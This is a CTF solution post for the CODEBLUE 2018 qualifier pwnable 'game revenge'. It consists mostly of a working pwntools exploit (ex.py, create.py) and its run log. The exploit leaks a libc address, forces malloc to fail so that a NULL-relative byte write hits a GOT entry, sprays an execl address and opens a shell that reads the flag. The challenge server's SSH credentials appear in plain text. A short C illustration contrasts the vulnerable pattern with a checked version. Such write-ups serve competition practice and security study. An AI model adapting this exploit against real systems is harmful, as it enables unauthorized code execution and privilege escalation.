CODEBLUE 2018 QUAL - game revenge (Exploit only)

2018. 8. 3. 04:22·CTF/2018

Category : pwnable

 

Summary : a big input file makes malloc fail, so ptr=malloc(size+1); ptr[size] = '\x00'; runs with ptr = 0 and size = 0x0804~~~~ (a NUL byte written at the address held in size)
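The bug the summary describes, as an added illustration that is not the challenge's source (which is not on this page): the unchecked-malloc pattern beside a hardened version. The allocation cap, the function names and the in-memory input are constructed for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Constructed allocation cap: lets a test force the malloc failure that a
 * 0x8000000-byte input provokes in the challenge, without exhausting memory. */
static size_t alloc_cap = (size_t)-1;
static void *capped_malloc(size_t n) { return n > alloc_cap ? NULL : malloc(n); }

/* BEFORE (the pattern from the summary): malloc's result is never checked.
 * On failure ptr is NULL, so `ptr[size] = '\0'` stores a zero byte at the
 * address `size`, an address fixed by whoever chose the input length. */
char *read_unchecked(FILE *f, size_t size) {
    char *ptr = capped_malloc(size + 1);
    fread(ptr, 1, size, f);
    ptr[size] = '\0';      /* NULL-relative write when the allocation failed */
    return ptr;
}

/* AFTER: bound the size, check the allocation, terminate at the bytes read. */
char *read_checked(FILE *f, size_t size, size_t max_size) {
    if (size > max_size)   /* assumes max_size < SIZE_MAX, so size + 1 cannot wrap */
        return NULL;
    char *ptr = capped_malloc(size + 1);
    if (ptr == NULL)       /* allocation failure is an error path, not a write */
        return NULL;
    size_t got = fread(ptr, 1, size, f);
    ptr[got] = '\0';
    return ptr;
}

/* Helper: an in-memory stand-in for an input file, built from constructed bytes. */
FILE *make_input(const char *data, size_t n) {
    FILE *f = tmpfile();
    if (f == NULL) return NULL;
    fwrite(data, 1, n, f);
    rewind(f);
    return f;
}

/* Returns 1 when the hardened reader refuses, rather than writes, on a forced
 * allocation failure (the case that is exploitable in the unchecked version). */
int checked_reader_refuses_on_alloc_failure(void) {
    FILE *f = make_input("abc", 3);
    alloc_cap = 2;                         /* capped_malloc(4) now returns NULL */
    char *p = read_checked(f, 3, 0x100000);
    alloc_cap = (size_t)-1;
    if (f) fclose(f);
    return p == NULL;
}
```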



First blood and the only solve, after a really long time! A write-up will be added soon.


ex.py

#!/usr/bin/python

from pwn import *
import re

# two SSH sessions: one runs the target, the other prepares the input files in /tmp/wwwwpp/
ssh_ = ssh(host = 'pwn2.task.ctf.codeblue.jp', password = 'lets_play' , user= 'game_chal')
ssh2_ = ssh(host = 'pwn2.task.ctf.codeblue.jp', password = 'lets_play' , user= 'game_chal')
s2 = ssh2_.process('/bin/sh', env={'PS1':''})
s2.sendline('cd /tmp/wwwwpp/')
s2.sendline('''ln -s setregid_sh `python -c 'print "\xb0\x1d\x1b"'`''')


# retry until the leaked libc base has the low nibbles the payload was built for
while 1:
    s = ssh_.process('/bin/sh', env={'PS1':''})
    s.sendline('cd /tmp/wwwwpp/')
    s.sendline('ulimit -c 1024')
    s.sendline('/home/p11454/game')

    # card game for memory leak
    s.recvuntil('3. Exit')
    s.sendline('2')

    # scanf("%u %u", ...) failed
    s.recvuntil('Input the coordinate of the 1st card to open\n')
    s.sendline('a b')

    s.recvuntil('Input the coordinate of the 2nd card to open\n')
    stack, libc_base = map(int, re.findall('\((\d+), (\d+)\)', s.recvline().strip())[0])
    #libc_base = libc_base - 0x1d0030
    libc_base = libc_base - 0x1d6010

    # last 2bytes of libc base must be 0xc000
    if (libc_base & 0xf000) != 0xc000:
        s.close()
        continue

    execl_libc = libc_base + 0xB0A80

    print 'libc_base :', hex(libc_base)
    print 'execl@libc : ', hex(execl_libc)
    # regenerate the quiz files with the computed address (see create.py)
    s2.sendline('python create.py {}'.format(hex(execl_libc)))
    s2.recvuntil('done')

    # spray ...
    for i in range(0, 20):
        print i
        s.recvuntil('3. Exit\n')
        s.sendline('1')
        s.recvuntil('Can you answer all the questions correctly?')
        s.recvuntil('Q. ')
        s.sendline('a')
        s.recvuntil('Wrong.')

    s.recvuntil('3. Exit\n')
    s.sendline('1')
    s.recvuntil('Can you answer all the questions correctly?')
    for i in range(0, 5):
        print i
        s.recvuntil('Q. ')
        s.sendline('u\x00')
        s.recvuntil('Correct!')

    print 'trigger!'
    s.interactive()


create.py

#!/usr/bin/python

import sys
from struct import pack

p32 = lambda x : pack("<L", x)

if len(sys.argv) != 2:
    exit(-1)

# write exactly `length` bytes to fname: the prefix 'a\nu\x00', then `data`
# repeated, filling out page by page (Python 2 integer division)
def create_sample(fname, data, length):
    with open(fname, 'wb') as f:
        i = length % 0x1000 if length % 0x1000 else 0x1000
        f.write('a\nu\x00'+(data*((i-4)/len(data))))
        while i < length:
            f.write((data * (0x1000 / len(data))))
            i += 0x1000

create_sample('youlose', 'a', 0x8000000)
create_sample('banner', 'a', 0x0804b069) # fputc@got
with open('flag', 'wb') as f:
    f.write('hello\nbye\n')

value = int(sys.argv[1], 16)
for i in range(1, 11):
    create_sample('quiz%02d' % i, p32(value), 0x8000000)

print 'done'


Exploit!

$ python ex.py
[+] Connecting to pwn2.task.ctf.codeblue.jp on port 22: Done
[!] Couldn't check security settings on 'pwn2.task.ctf.codeblue.jp'
[+] Connecting to pwn2.task.ctf.codeblue.jp on port 22: Done
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16527
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16533
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16533)
..........................
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16672
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16672)
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16677
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16677)
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16682
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16682)
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16687
libc_base : 0xf75fc000
execl@libc : 0xf76aca80
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
0
1
2
3
4
trigger!
[*] Switching to interactive mode


(null)Q. hello
> $
Wrong.
$ id
uid=33433(game_chal) gid=11454(p11454) groups=11454(p11454),33433(game_chal)
$ cat /home/p11454/actual_flag
CBCTF{Natural vulnerability in a miniature garden}

Flag : CBCTF{Natural vulnerability in a miniature garden}


pwn3r_45